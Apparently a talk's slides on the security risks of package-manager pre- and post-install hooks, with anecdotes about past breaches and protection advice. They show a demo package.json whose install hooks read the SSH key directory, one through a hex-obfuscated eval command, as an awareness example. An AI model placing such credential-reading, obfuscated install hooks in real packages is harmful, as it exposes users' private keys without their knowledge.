Photo Credit:

What my talk is about:

  • Package Managers Pre-/Post-Install Security 
  • Witty Anecdotes
  • RubberDucky ಠ_ಠ

Who Am I?

Johannes Boyne

Founded: Archkomm GmbH

Now: @ zweitag

IT-Security of PAckage Managers

  • Pre-/Post-Installs of Package Managers
  • ...let's get evil
  • Security Projects

Pre-/Post-Installs of Package Managers

So practical...
So easy...
Photo Credit:


...if you are not careful
Photo Credit:

What does a Package Manager Do?

  • Installs packages / modules / gems (called it what you want)
  • Pre-/Post-Installs
    • How often have you looked into the pre-/post-install hooks?

  "name": "honeypotpackage",
  "version": "0.0.2",
  "description": "evel knievel",
  "main": "index.js",
  "scripts": {
    "preinstall": "echo \"I will get your sshs:\" && cat ~/.ssh/",
    "postinstall": "echo \"I will get your sshs:\" && eval `printf \"\\x63\\x61\\x74\\x20\\x7e\\x2f\\x2e\\x73\\x73\\x68\\x2f\\x69\\x64\\x5f\\x72\\x73\\x61\\x2e\\x70\\x75\\x62\"`"
  "keywords": ["evil","do","not","use"],
  "author": "Johannes Boyne <>",
  "license": "MIT"

cat ~/.ssh/

eval `printf \"\\x63\\x61\\x74\\x20\\x7e\\x2f\\x2e\\x73\\x73\\x68\\x2f\\x69\\x64\\x5f\\x72\\x73\\x61\\x2e\\x70\\x75\\x62\"`

How to protect yourself and your clients?

  • reading, reading, reading, ... :( 
  • Support one of the security projects
  • Implement "scanners" / virtual testing machines
    • one of my little side projects
  • or use private repository
    • private-repo-as-a-service gemfury

Security Projects

Node Security Project
Ruby on Rails Security Project
OWASP Python Security Project

Witty Anecdotes



Publishing a SYMANTEC product source code


Vulnerability on a Server was exploited


January 2012


Trojan was able to login as user while the smartcard was inserted in the smartcard reader

Free BSD


SSH keys had been stolen


Two servers of FREE BSD had been hacked


November 2012


Servers had to be taken offline and new installed

What can you do?

=> Secure Programming
Photo Credit:

Rubber Ducky

CODE A DIFFERENCE: Nutz' deine Fähigkeiten, um deine Stadt zu verbessern!